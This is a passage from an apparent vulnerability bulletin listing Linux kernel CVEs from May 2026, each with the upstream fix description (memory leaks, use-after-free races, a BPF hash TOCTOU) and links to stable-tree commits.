tell_cpu_to_push <-------------------------- atomic_inc(rto_loop_next) rd->rto_loop != next rto_next_cpu irq_work_queue_on rto_push_irq_work_func Fix redundant self-IPI by filtering the initiating CPU in rto_next_cpu(). This solution has been verified to effectively eliminate spurious self-IPIs and prevent CPU hardlockup scenarios. | 2026-05-27 | not yet calculated | CVE-2026-45919 | https://git.kernel.org/stable/c/d57d0746276a88ea43a2cc62b849fd8a95e32e41 https://git.kernel.org/stable/c/3b3c672a66db3de3b40f8a7057864bc1f874ede3 https://git.kernel.org/stable/c/16ca9f3117e9a294646c897daf08a5ab546c711b https://git.kernel.org/stable/c/8ad5577b2d4acfd83f03d97a0aece2d18aac5f07 https://git.kernel.org/stable/c/a6a73403733e86748421f2eeaf028c85683ef896 https://git.kernel.org/stable/c/52aeb1e07ec223caf212f036817976c98d2aa250 https://git.kernel.org/stable/c/9f25edc5a20cb52a5abbf25f0724bb4732b81801 https://git.kernel.org/stable/c/94894c9c477e53bcea052e075c53f89df3d2a33e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ext4: fix dirtyclusters double decrement on fs shutdown fstests test generic/388 occasionally reproduces a warning in ext4_put_super() associated with the dirty clusters count: WARNING: CPU: 7 PID: 76064 at fs/ext4/super.c:1324 ext4_put_super+0x48c/0x590 [ext4] Tracing the failure shows that the warning fires due to an s_dirtyclusters_counter value of -1. IOW, this appears to be a spurious decrement as opposed to some sort of leak. Further tracing of the dirty cluster count deltas and an LLM scan of the resulting output identified the cause as a double decrement in the error path between ext4_mb_mark_diskspace_used() and the caller ext4_mb_new_blocks(). First, note that generic/388 is a shutdown vs. fsstress test and so produces a random set of operations and shutdown injections. In the problematic case, the shutdown triggers an error return from the ext4_handle_dirty_metadata() call(s) made from ext4_mb_mark_context(). The changed value is non-zero at this point, so ext4_mb_mark_diskspace_used() does not exit after the error bubbles up from ext4_mb_mark_context(). Instead, the former decrements both cluster counters and returns the error up to ext4_mb_new_blocks(). The latter falls into the !ar->len out path which decrements the dirty clusters counter a second time, creating the inconsistency. To avoid this problem and simplify ownership of the cluster reservation in this codepath, lift the counter reduction to a single place in the caller. This makes it more clear that ext4_mb_new_blocks() is responsible for acquiring cluster reservation (via ext4_claim_free_clusters()) in the !delalloc case as well as releasing it, regardless of whether it ends up consumed or returned due to failure. | 2026-05-27 | not yet calculated | CVE-2026-45920 | https://git.kernel.org/stable/c/523d5a4df3c649fa305c89efb552ec62a1ce9d3d https://git.kernel.org/stable/c/ca408af08544d96769c93a3d81a7f63f61129e95 https://git.kernel.org/stable/c/55576fa14771d33994c29a9ae960e07bb3f56c20 https://git.kernel.org/stable/c/dbc4e10619ed87a50e637b96f2e574df36a7a769 https://git.kernel.org/stable/c/61e372122b6d95aec940fdaea0a16f988f359897 https://git.kernel.org/stable/c/3924aea2c33df3864929c1acd178bfc29d8f005f https://git.kernel.org/stable/c/81982a11406c5da6c6e2b188028e7056e16b7128 https://git.kernel.org/stable/c/94a8cea54cd935c54fa2fba70354757c0fc245e3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mtd: parsers: Fix memory leak in mtd_parser_tplink_safeloader_parse() The function mtd_parser_tplink_safeloader_parse() allocates buf via mtd_parser_tplink_safeloader_read_table(). If the allocation for parts[idx].name fails inside the loop, the code jumps to the err_free label without freeing buf, leading to a memory leak. Fix this by freeing the temporary buffer buf in the err_free label. Compile tested only. Issue found using a prototype static analysis tool and code review. | 2026-05-27 | not yet calculated | CVE-2026-45921 | https://git.kernel.org/stable/c/0f5e62ea5c43146eacdc6861cb1022ffae1b79bc https://git.kernel.org/stable/c/e97f5fac8ce9a6b9ec724c97d86b0985e915fdca https://git.kernel.org/stable/c/ec121ad626c319085f6d40a52cd04e99b4554926 https://git.kernel.org/stable/c/971e9c53aed82f17a9c6a65daa4e21cc15eba5b1 https://git.kernel.org/stable/c/980ce2b02dd06a4fdf5fee38b2e14becf9cf7b8b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/mlx5: Fix memory leak in GET_DATA_DIRECT_SYSFS_PATH handler The UVERBS_HANDLER(MLX5_IB_METHOD_GET_DATA_DIRECT_SYSFS_PATH) function allocates memory for the device path using kobject_get_path(). If the length of the device path exceeds the output buffer length, the function returns -ENOSPC but does not free the allocated memory, resulting in a memory leak. Add a kfree() call to the error path to ensure the allocated memory is properly freed. Compile tested only. Issue found using a prototype static analysis tool and code review. | 2026-05-27 | not yet calculated | CVE-2026-45922 | https://git.kernel.org/stable/c/ee998cdbff6680891b0efd9d6ce53a388e5342c3 https://git.kernel.org/stable/c/b2bc649c18fbe8a7fd38d17266da3dcbfbcc44d2 https://git.kernel.org/stable/c/b3a10eca24fcfe913c0875e620f19596001bd6dc https://git.kernel.org/stable/c/9b9d253908478f504297ac283c514e5953ddafa6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: usb: catc: enable basic endpoint checking catc_probe() fills three URBs with hardcoded endpoint pipes without verifying the endpoint descriptors: - usb_sndbulkpipe(usbdev, 1) and usb_rcvbulkpipe(usbdev, 1) for TX/RX - usb_rcvintpipe(usbdev, 2) for interrupt status A malformed USB device can present these endpoints with transfer types that differ from what the driver assumes. Add a catc_usb_ep enum for endpoint numbers, replacing magic constants throughout. Add usb_check_bulk_endpoints() and usb_check_int_endpoints() calls after usb_set_interface() to verify endpoint types before use, rejecting devices with mismatched descriptors at probe time. Similar to - commit 90b7f2961798 ("net: usb: rtl8150: enable basic endpoint checking") which fixed the issue in rtl8150. | 2026-05-27 | not yet calculated | CVE-2026-45923 | https://git.kernel.org/stable/c/eade522d3e6ac3f3bfb51bfa5b5b4b32bd0b846f https://git.kernel.org/stable/c/ac7739b78ded519e1d9919a814da3b34120bec8c https://git.kernel.org/stable/c/163d04897e57633c5d2e69734e4e4b22bb63f50d https://git.kernel.org/stable/c/a488001a8197da4f9c413eec8f6acbff71c60145 https://git.kernel.org/stable/c/36c28b028efba0f42218d41fed12c47ce217c1f1 https://git.kernel.org/stable/c/1a42cfced8900d33d032c7ec338484855b61b8cc https://git.kernel.org/stable/c/9e7021d2aeae57c323a6f722ed7915686cdcc123 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ksmbd: call ksmbd_vfs_kern_path_end_removing() on some error paths There are two places where ksmbd_vfs_kern_path_end_removing() needs to be called in order to balance what the corresponding successful call to ksmbd_vfs_kern_path_start_removing() has done, i.e. drop inode locks and put the taken references. Otherwise there might be potential deadlocks and unbalanced locks which are caught like: BUG: workqueue leaked lock or atomic: kworker/5:21/0x00000000/7596 last function: handle_ksmbd_work 2 locks held by kworker/5:21/7596: #0: ffff8881051ae448 (sb_writers#3){.+.+}-{0:0}, at: ksmbd_vfs_kern_path_locked+0x142/0x660 #1: ffff888130e966c0 (&type->i_mutex_dir_key#3/1){+.+.}-{4:4}, at: ksmbd_vfs_kern_path_locked+0x17d/0x660 CPU: 5 PID: 7596 Comm: kworker/5:21 Not tainted 6.1.162-00456-gc29b353f383b #138 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.17.0-debian-1.17.0-1 04/01/2014 Workqueue: ksmbd-io handle_ksmbd_work Call Trace: <TASK> dump_stack_lvl+0x44/0x5b process_one_work.cold+0x57/0x5c worker_thread+0x82/0x600 kthread+0x153/0x190 ret_from_fork+0x22/0x30 </TASK> Found by Linux Verification Center (linuxtesting.org). | 2026-05-27 | not yet calculated | CVE-2026-45924 | https://git.kernel.org/stable/c/8e3a3192ef78d8302916408d62813b1fddfc8972 https://git.kernel.org/stable/c/f221baa80e5959a0c08a7e34abbf2a4d3cf0e1c2 https://git.kernel.org/stable/c/cf29329a13df79c198b45dfc92577638d30b56fa https://git.kernel.org/stable/c/34d6691933682f0516259a31b39d2cebcedec0a5 https://git.kernel.org/stable/c/0c578e8065c4b08d5635a4cbc0f6321df9d20f79 https://git.kernel.org/stable/c/4c38600feb81c670edb82e49d201d3d2d00cd4c3 https://git.kernel.org/stable/c/a09dc10d1353f0e92c21eae2a79af1c2b1ddcde8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: thermal/of: Fix reference leak in thermal_of_cm_lookup() In thermal_of_cm_lookup(), tr_np is obtained via of_parse_phandle(), but never released. Use the __free(device_node) cleanup attribute to automatically release the node and fix the leak. [ rjw: Changelog edits ] | 2026-05-27 | not yet calculated | CVE-2026-45925 | https://git.kernel.org/stable/c/8af710156c53cdb392d529497ef2b3a10a1f9370 https://git.kernel.org/stable/c/8344d5da9df74fdbef676214d0c482fc822a01ca https://git.kernel.org/stable/c/025796ccd7f9f2e013e12319de26b6c021a80c1f https://git.kernel.org/stable/c/a1fe789a96fe47733c133134fd264cb7ca832395 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: rust: pwm: Fix potential memory leak on init error When initializing a PWM chip using pwmchip_alloc(), the allocated device owns an initial reference that must be released on all error paths. If __pinned_init() were to fail, the allocated pwm_chip would currently leak because the error path returns without calling pwmchip_put(). | 2026-05-27 | not yet calculated | CVE-2026-45926 | https://git.kernel.org/stable/c/baa8b7097d9cc68ff85819cf683972a58c2ce32b https://git.kernel.org/stable/c/a2633dc243c35754a0c2270131d8a199c987c9bf |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: Require frozen map for calculating map hash Currently, bpf_map_get_info_by_fd calculates and caches the hash of the map regardless of the map's frozen state. This leads to a TOCTOU bug where userspace can call BPF_OBJ_GET_INFO_BY_FD to cache the hash and then modify the map contents before freezing. Therefore, a trusted loader can be tricked into verifying the stale hash while loading the modified contents. Fix this by returning -EPERM if the map is not frozen when the hash is requested. This ensures the hash is only generated for the final, immutable state of the map. | 2026-05-27 | not yet calculated | CVE-2026-45927 | https://git.kernel.org/stable/c/7752d36343862323bbeea4ce3adf0ec2ed86e122 https://git.kernel.org/stable/c/f415e114b58fe02c41191e47f24bdabb438daf72 https://git.kernel.org/stable/c/a2c86aa621c22f2a7e26c654f936d65cfff0aa91 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: chips-media: wave5: Fix memory leak on codec_info allocation failure In wave5_vpu_open_enc() and wave5_vpu_open_dec(), a vpu instance is allocated via kzalloc(). If the subsequent allocation for inst->codec_info fails, the functions return -ENOMEM without freeing the previously allocated instance, causing a memory leak. Fix this by calling kfree() on the instance in this error path to ensure it is properly released. | 2026-05-27 | not yet calculated | CVE-2026-45928 | https://git.kernel.org/stable/c/52defdd4034db1a34bb48006f889d66a3629224b https://git.kernel.org/stable/c/1de71556cbd6e1d0d26fb86b9b3bb8caa0df8495 https://git.kernel.org/stable/c/32e9e45cf7e3422d21fa64535588d3572faf71c3 https://git.kernel.org/stable/c/a519e21e32398459ba357e67b541402f7295ee1b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: mctp: ensure our nlmsg responses are initialised Syed Faraz Abrar (@farazsth98) from Zellic, and Pumpkin (@u1f383) from DEVCORE Research Team working with Trend Micro Zero Day Initiative report that a RTM_GETNEIGH will return uninitalised data in the pad bytes of the ndmsg data. Ensure we're initialising the netlink data to zero, in the link, addr and neigh response messages. | 2026-05-27 | not yet calculated | CVE-2026-45930 | https://git.kernel.org/stable/c/6fb6a97c86abb8592158088afaea0eb464cf9de1 https://git.kernel.org/stable/c/a6a9bc544b675d8b5180f2718ec985ad267b5cbf |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: fix EEXIST abort due to non-consecutive gaps in chunk allocation I have been observing a number of systems aborting at insert_dev_extents() in btrfs_create_pending_block_groups(). The following is a sample stack trace of such an abort coming from forced chunk allocation (typically behind CONFIG_BTRFS_EXPERIMENTAL) but this can theoretically happen to any DUP chunk allocation. [81.801] ------------[ cut here ]------------ [81.801] BTRFS: Transaction aborted (error -17) [81.801] WARNING: fs/btrfs/block-group.c:2876 at btrfs_create_pending_block_groups+0x721/0x770 [btrfs], CPU#1: bash/319 [81.802] Modules linked in: virtio_net btrfs xor zstd_compress raid6_pq null_blk [81.803] CPU: 1 UID: 0 PID: 319 Comm: bash Kdump: loaded Not tainted 6.19.0-rc6+ #319 NONE [81.803] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Arch Linux 1.17.0-2-2 04/01/2014 [81.804] RIP: 0010:btrfs_create_pending_block_groups+0x723/0x770 [btrfs] [81.806] RSP: 0018:ffffa36241a6bce8 EFLAGS: 00010282 [81.806] RAX: 000000000000000d RBX: ffff8e699921e400 RCX: 0000000000000000 [81.807] RDX: 0000000002040001 RSI: 00000000ffffffef RDI: ffffffffc0608bf0 [81.807] RBP: 00000000ffffffef R08: ffff8e69830f6000 R09: 0000000000000007 [81.808] R10: ffff8e699921e5e8 R11: 0000000000000000 R12: ffff8e6999228000 [81.808] R13: ffff8e6984d82000 R14: ffff8e69966a69c0 R15: ffff8e69aa47b000 [81.809] FS: 00007fec6bdd9740(0000) GS:ffff8e6b1b379000(0000) knlGS:0000000000000000 [81.809] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [81.810] CR2: 00005604833670f0 CR3: 0000000116679000 CR4: 00000000000006f0 [81.810] Call Trace: [81.810] <TASK> [81.810] __btrfs_end_transaction+0x3e/0x2b0 [btrfs] [81.811] btrfs_force_chunk_alloc_store+0xcd/0x140 [btrfs] [81.811] kernfs_fop_write_iter+0x15f/0x240 [81.812] vfs_write+0x264/0x500 [81.812] ksys_write+0x6c/0xe0 [81.812] do_syscall_64+0x66/0x770 [81.812] entry_SYSCALL_64_after_hwframe+0x76/0x7e [81.813] RIP: 0033:0x7fec6be66197 [81.814] RSP: 002b:00007fffb159dd30 EFLAGS: 00000202 ORIG_RAX: 0000000000000001 [81.815] RAX: ffffffffffffffda RBX: 00007fec6bdd9740 RCX: 00007fec6be66197 [81.815] RDX: 0000000000000002 RSI: 0000560483374f80 RDI: 0000000000000001 [81.816] RBP: 0000560483374f80 R08: 0000000000000000 R09: 0000000000000000 [81.816] R10: 0000000000000000 R11: 0000000000000202 R12: 0000000000000002 [81.817] R13: 00007fec6bfb85c0 R14: 00007fec6bfb5ee0 R15: 00005604833729c0 [81.817] </TASK> [81.817] irq event stamp: 20039 [81.818] hardirqs last enabled at (20047): [<ffffffff99a68302>] __up_console_sem+0x52/0x60 [81.818] hardirqs last disabled at (20056): [<ffffffff99a682e7>] __up_console_sem+0x37/0x60 [81.819] softirqs last enabled at (19470): [<ffffffff999d2b46>] __irq_exit_rcu+0x96/0xc0 [81.819] softirqs last disabled at (19463): [<ffffffff999d2b46>] __irq_exit_rcu+0x96/0xc0 [81.820] ---[ end trace 0000000000000000 ]--- [81.820] BTRFS: error (device dm-7 state A) in btrfs_create_pending_block_groups:2876: errno=-17 Object already exists Inspecting these aborts with drgn, I observed a pattern of overlapping chunk_maps. Note how stripe 1 of the first chunk overlaps in physical address with stripe 0 of the second chunk. Physical Start Physical End Length Logical Type Stripe ---------------------------------------------------------------------------------------------------- 0x0000000102500000 0x0000000142500000 1.0G 0x0000000641d00000 META|DUP 0/2 0x0000000142500000 0x0000000182500000 1.0G 0x0000000641d00000 META|DUP 1/2 0x0000000142500000 0x0000000182500000 1.0G 0x0000000601d00000 META|DUP 0/2 0x0000000182500000 0x00000001c2500000 1.0G 0x0000000601d00000 META|DUP 1/2 Now how could this possibly happen? All chunk allocation is ---truncated--- | 2026-05-27 | not yet calculated | CVE-2026-45934 | https://git.kernel.org/stable/c/7d4eadee7042d27fcea659fcdd738f463a7d2e70 https://git.kernel.org/stable/c/156cac365e27a82b64ae510c5f463fd81f0265b1 https://git.kernel.org/stable/c/b14c5e04bd0f722ed631845599d52d03fcae1bc1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: power: supply: goldfish: Fix use-after-free in power_supply_changed() Using the `devm_` variant for requesting IRQ _before_ the `devm_` variant for allocating/registering the `power_supply` handle, means that the `power_supply` handle will be deallocated/unregistered _before_ the interrupt handler (since `devm_` naturally deallocates in reverse allocation order). This means that during removal, there is a race condition where an interrupt can fire just _after_ the `power_supply` handle has been freed, *but* just _before_ the corresponding unregistration of the IRQ handler has run. This will lead to the IRQ handler calling `power_supply_changed()` with a freed `power_supply` handle. Which usually crashes the system or otherwise silently corrupts the memory... Note that there is a similar situation which can also happen during `probe()`; the possibility of an interrupt firing _before_ registering the `power_supply` handle. This would then lead to the nasty situation of using the `power_supply` handle *uninitialized* in `power_supply_changed()`. Fix this racy use-after-free by making sure the IRQ is requested _after_ the registration of the `power_supply` handle. | 2026-05-27 | not yet calculated | CVE-2026-45936 | https://git.kernel.org/stable/c/589d4fe56713c6344cd9f8939f9c7621c85f0966 https://git.kernel.org/stable/c/bad8b61eb5059acd88349680e47839342dc89e94 https://git.kernel.org/stable/c/33751e28842bf5aee5ef7b2b8d5e456a069095cb https://git.kernel.org/stable/c/77ea437faa4c06362e3ecfd2d7264eaa7ac1e82c https://git.kernel.org/stable/c/4350505e82b4f972ddb788e1c712c557c38859d0 https://git.kernel.org/stable/c/8c89aade8335e26a6a7dcda18992d15f51943927 https://git.kernel.org/stable/c/0b29ffe4090a3fc7a7649de20e1eb1e53adddac7 https://git.kernel.org/stable/c/b2ce982e2e0c888dc55c888ad0e20ea04daf2e6b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: crypto: inside-secure/eip93 - fix kernel panic in driver detach During driver detach, the same hash algorithm is unregistered multiple times due to a wrong iterator. | 2026-05-27 | not yet calculated | CVE-2026-45937 | https://git.kernel.org/stable/c/7530c3595d1e23bc5938cbd44b7e8f33457fc71f https://git.kernel.org/stable/c/91c6f25075a8f8fbd7316d73e1edf281a94f78df https://git.kernel.org/stable/c/b6e32ba6d32503440a3e3e16c8d0521cbb7e0c5d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: power: supply: pm8916_lbc: Fix use-after-free in power_supply_changed() Using the `devm_` variant for requesting IRQ _before_ the `devm_` variant for allocating/registering the `power_supply` handle, means that the `power_supply` handle will be deallocated/unregistered _before_ the interrupt handler (since `devm_` naturally deallocates in reverse allocation order). This means that during removal, there is a race condition where an interrupt can fire just _after_ the `power_supply` handle has been freed, *but* just _before_ the corresponding unregistration of the IRQ handler has run. This will lead to the IRQ handler calling `power_supply_changed()` with a freed `power_supply` handle. Which usually crashes the system or otherwise silently corrupts the memory... Note that there is a similar situation which can also happen during `probe()`; the possibility of an interrupt firing _before_ registering the `power_supply` handle. This would then lead to the nasty situation of using the `power_supply` handle *uninitialized* in `power_supply_changed()`. Fix this racy use-after-free by making sure the IRQ is requested _after_ the registration of the `power_supply` handle. | 2026-05-27 | not yet calculated | CVE-2026-45938 | https://git.kernel.org/stable/c/dbe579e620ef0f53db490ec79a8566e4ea8918ac https://git.kernel.org/stable/c/08e674e9862a2db46fb234eb7c5442455ece0131 https://git.kernel.org/stable/c/d7d31fc99d248d5f47588f50dce5c7599c991c6a https://git.kernel.org/stable/c/b7508129978ae1e2ed9b0410396abc05def9c4eb |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: gpib: Fix memory leak in ni_usb_init() In ni_usb_init(), if ni_usb_setup_init() fails, the function returns -EFAULT without freeing the allocated writes buffer, leading to a memory leak. Additionally, ni_usb_setup_init() returns 0 on failure, which causes ni_usb_init() to return -EFAULT, an inappropriate error code for this situation. Fix the leak by freeing writes in the error path. Modify ni_usb_setup_init() to return -EINVAL on failure and propagate this error code in ni_usb_init(). | 2026-05-27 | not yet calculated | CVE-2026-45939 | https://git.kernel.org/stable/c/9c97fcfb7a62dea893104a046d544da8ac23370b https://git.kernel.org/stable/c/c899d4b62c0757a280831e89c1f3801b597e8f38 https://git.kernel.org/stable/c/b89921eed8cf2d97250bac4be38dbcfbf048b586 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: stmmac: fix oops when split header is enabled For GMAC4, when split header is enabled, in some rare cases, the hardware does not fill buf2 of the first descriptor with payload. Thus we cannot assume buf2 is always fully filled if it is not the last descriptor. Otherwise, the length of buf2 of the second descriptor will be calculated wrong and cause an oops: Unable to handle kernel paging request at virtual address ffff00019246bfc0 ... x2 : 0000000000000040 x1 : ffff00019246bfc0 x0 : ffff00009246c000 Call trace: dcache_inval_poc+0x28/0x58 (P) dma_direct_sync_single_for_cpu+0x38/0x6c __dma_sync_single_for_cpu+0x34/0x6c stmmac_napi_poll_rx+0x8f0/0xb60 __napi_poll.constprop.0+0x30/0x144 net_rx_action+0x160/0x274 handle_softirqs+0x1b8/0x1fc ... To fix this, the PL bit-field in RDES3 register is used for all descriptors, whether it is the last descriptor or not. | 2026-05-27 | not yet calculated | CVE-2026-45940 | https://git.kernel.org/stable/c/b1f23df09e7dbf4c86b6908dff7efb8cb2b7d609 https://git.kernel.org/stable/c/36f81cb7d82e9614a7058da6abdf2e3a03993df1 https://git.kernel.org/stable/c/babab1b42ed68877ef669a08384becf281ad2582 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: tpm: tpm_i2c_infineon: Fix locality leak on get_burstcount() failure get_burstcount() can return -EBUSY on timeout. When this happens, the function returns directly without releasing the locality that was acquired at the beginning of tpm_tis_i2c_send(). Use goto out_err to ensure proper cleanup when get_burstcount() fails. | 2026-05-27 | not yet calculated | CVE-2026-45941 | https://git.kernel.org/stable/c/8f124c5582d443ac9fb690db26d08cab5d6ba76e https://git.kernel.org/stable/c/c24c9c4cab11858f22f309521ba7ea5b1e7385f2 https://git.kernel.org/stable/c/1bb8f8826d0748b4b92a98fb6b6dfe52081739f5 https://git.kernel.org/stable/c/948966e546f29af04391d98b8e378e4a7670c1c1 https://git.kernel.org/stable/c/a61b8412e3eb8b71646dba867e8252d8560a1a27 https://git.kernel.org/stable/c/1a22048c1117cdfac185ba450aba67ed6b65dc87 https://git.kernel.org/stable/c/2f7a665e1323359d99c74301d1e180f5e2c40181 https://git.kernel.org/stable/c/bbd6e97c836cbeb9606d7b7e5dcf8a1d89525713 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: erofs: fix inline data read failure for ztailpacking pclusters Compressed folios for ztailpacking pclusters must be valid before adding these pclusters to I/O chains. Otherwise, z_erofs_decompress_pcluster() may assume they are already valid and then trigger a NULL pointer dereference. It is somewhat hard to reproduce because the inline data is in the same block as the tail of the compressed indexes, which are usually read just before. However, it may still happen if a fatal signal arrives while read_mapping_folio() is running, as shown below: erofs: (device dm-1): z_erofs_pcluster_begin: failed to get inline data -4 Unable to handle kernel NULL pointer dereference at virtual address 0000000000000008 ... pc : z_erofs_decompress_queue+0x4c8/0xa14 lr : z_erofs_decompress_queue+0x160/0xa14 sp : ffffffc08b3eb3a0 x29: ffffffc08b3eb570 x28: ffffffc08b3eb418 x27: 0000000000001000 x26: ffffff8086ebdbb8 x25: ffffff8086ebdbb8 x24: 0000000000000001 x23: 0000000000000008 x22: 00000000fffffffb x21: dead000000000700 x20: 00000000000015e7 x19: ffffff808babb400 x18: ffffffc089edc098 x17: 00000000c006287d x16: 00000000c006287d x15: 0000000000000004 x14: ffffff80ba8f8000 x13: 0000000000000004 x12: 00000006589a77c9 x11: 0000000000000015 x10: 0000000000000000 x9 : 0000000000000000 x8 : 0000000000000000 x7 : 0000000000000000 x6 : 000000000000003f x5 : 0000000000000040 x4 : ffffffffffffffe0 x3 : 0000000000000020 x2 : 0000000000000008 x1 : 0000000000000000 x0 : 0000000000000000 Call trace: z_erofs_decompress_queue+0x4c8/0xa14 z_erofs_runqueue+0x908/0x97c z_erofs_read_folio+0x128/0x228 filemap_read_folio+0x68/0x128 filemap_get_pages+0x44c/0x8b4 filemap_read+0x12c/0x5b8 generic_file_read_iter+0x4c/0x15c do_iter_readv_writev+0x188/0x1e0 vfs_iter_read+0xac/0x1a4 backing_file_read_iter+0x170/0x34c ovl_read_iter+0xf0/0x140 vfs_read+0x28c/0x344 ksys_read+0x80/0xf0 __arm64_sys_read+0x24/0x34 invoke_syscall+0x60/0x114 el0_svc_common+0x88/0xe4 do_el0_svc+0x24/0x30 el0_svc+0x40/0xa8 el0t_64_sync_handler+0x70/0xbc el0t_64_sync+0x1bc/0x1c0 Fix this by reading the inline data before allocating and adding the pclusters to the I/O chains. | 2026-05-27 | not yet calculated | CVE-2026-45943 | https://git.kernel.org/stable/c/ad07ea069f924465061cfee40ef2861bb99f4dd8 https://git.kernel.org/stable/c/5de1aa0bf3a5db0b3cbf61959da5ac61250833ed https://git.kernel.org/stable/c/92088bd9aa2a7246bba8b9648fbc64edd173cf17 https://git.kernel.org/stable/c/c134a40f86efb8d6b5a949ef70e06d5752209be5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: power: supply: ab8500: Fix use-after-free in power_supply_changed() Using the `devm_` variant for requesting IRQ _before_ the `devm_` variant for allocating/registering the `power_supply` handle, means that the `power_supply` handle will be deallocated/unregistered _before_ the interrupt handler (since `devm_` naturally deallocates in reverse allocation order). This means that during removal, there is a race condition where an interrupt can fire just _after_ the `power_supply` handle has been freed, *but* just _before_ the corresponding unregistration of the IRQ handler has run. This will lead to the IRQ handler calling `power_supply_changed()` with a freed `power_supply` handle. Which usually crashes the system or otherwise silently corrupts the memory... Note that there is a similar situation which can also happen during `probe()`; the possibility of an interrupt firing _before_ registering the `power_supply` handle. This would then lead to the nasty situation of using the `power_supply` handle *uninitialized* in `power_supply_changed()`. Commit 1c1f13a006ed ("power: supply: ab8500: Move to componentized binding") introduced this issue during a refactorization. Fix this racy use-after-free by making sure the IRQ is requested _after_ the registration of the `power_supply` handle. | 2026-05-27 | not yet calculated | CVE-2026-45946 | https://git.kernel.org/stable/c/43cbb78ee047b9b12d096d40e3be265969d4c1f8 https://git.kernel.org/stable/c/551672981fe227122258a25a385a05f5c0746ad6 https://git.kernel.org/stable/c/f50433f2603def08b21a4bf2fd238687fb5cbde9 https://git.kernel.org/stable/c/847eeb6c0efcd76c7def73857cf798a4fcd8f79b https://git.kernel.org/stable/c/709db4b476e254579d9c48ec34d397a41ca0c407 https://git.kernel.org/stable/c/46dbda27b028d78087667e8280966b99cec015ca https://git.kernel.org/stable/c/c4af8a98bb52825a5331ae1d0604c0ea6956ba4b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: Fix memory leak in amdgpu_acpi_enumerate_xcc() In amdgpu_acpi_enumerate_xcc(), if amdgpu_acpi_dev_init() returns -ENOMEM, the function returns directly without releasing the allocated xcc_info, resulting in a memory leak. Fix this by ensuring that xcc_info is properly freed in the error paths. Compile tested only. Issue found using a prototype static analysis tool and code review. | 2026-05-27 | not yet calculated | CVE-2026-45947 | https://git.kernel.org/stable/c/e87c73a80a12d337cf5f493c0956f6c2c9eafd80 https://git.kernel.org/stable/c/18a7bbd11f17a7cd4c42fd5955d3675d68c692df https://git.kernel.org/stable/c/d1370ef2ecf7d4df25e3e1e430cd191b1e7f8596 https://git.kernel.org/stable/c/7e4b612fe7a960d610c20260c9ee220bddd1b215 https://git.kernel.org/stable/c/c9be63d565789b56ca7b0197e2cb78a3671f95a8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ext4: fix memory leak in ext4_ext_shift_extents() In ext4_ext_shift_extents(), if the extent is NULL in the while loop, the function returns immediately without releasing the path obtained via ext4_find_extent(), leading to a memory leak. Fix this by jumping to the out label to ensure the path is properly released. | 2026-05-27 | not yet calculated | CVE-2026-45948 | https://git.kernel.org/stable/c/7e807cb8603b7664fa630a696cd891d9a03c248d https://git.kernel.org/stable/c/afc5e61e1a07b2b833bd72cbee36ecce9cd901e2 https://git.kernel.org/stable/c/1bce219ee5512cf179ba40cf114945a14a16e21f https://git.kernel.org/stable/c/4a79fde8db7eba7f1128d971ceba4e3c9ac84aec https://git.kernel.org/stable/c/2f4b1052246ca646bb17bfe0f53df2fdf9729b58 https://git.kernel.org/stable/c/12615ab4bfb69678e5d961b28bb70040299e51b1 https://git.kernel.org/stable/c/bd7b52557e4a3ccd7595fdb3a585f1257de57935 https://git.kernel.org/stable/c/ca81109d4a8f192dc1cbad4a1ee25246363c2833 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: hwrng: core - use RCU and work_struct to fix race condition Currently, hwrng_fill is not cleared until the hwrng_fillfn() thread exits. Since hwrng_unregister() reads hwrng_fill outside the rng_mutex lock, a concurrent hwrng_unregister() may call kthread_stop() again on the same task. Additionally, if hwrng_unregister() is called immediately after hwrng_register(), the stopped thread may have never been executed. Thus, hwrng_fill remains dirty even after hwrng_unregister() returns. In this case, subsequent calls to hwrng_register() will fail to start new threads, and hwrng_unregister() will call kthread_stop() on the same freed task. In both cases, a use-after-free occurs: refcount_t: addition on 0; use-after-free. WARNING: ... at lib/refcount.c:25 refcount_warn_saturate+0xec/0x1c0 Call Trace: kthread_stop+0x181/0x360 hwrng_unregister+0x288/0x380 virtrng_remove+0xe3/0x200 This patch fixes the race by protecting the global hwrng_fill pointer inside the rng_mutex lock, so that hwrng_fillfn() thread is stopped only once, and calls to kthread_run() and kthread_stop() are serialized with the lock held. To avoid deadlock in hwrng_fillfn() while being stopped with the lock held, we convert current_rng to RCU, so that get_current_rng() can read current_rng without holding the lock. To remove the lock from put_rng(), we also delay the actual cleanup into a work_struct. Since get_current_rng() no longer returns ERR_PTR values, the IS_ERR() checks are removed from its callers. With hwrng_fill protected by the rng_mutex lock, hwrng_fillfn() can no longer clear hwrng_fill itself. Therefore, if hwrng_fillfn() returns directly after current_rng is dropped, kthread_stop() would be called on a freed task_struct later. To fix this, hwrng_fillfn() calls schedule() now to keep the task alive until being stopped. The kthread_stop() call is also moved from hwrng_unregister() to drop_current_rng(), ensuring kthread_stop() is called on all possible paths where current_rng becomes NULL, so that the thread would not wait forever. | 2026-05-27 | not yet calculated | CVE-2026-45949 | https://git.kernel.org/stable/c/d5b7730f06994499632026c30e38e0317c4569e2 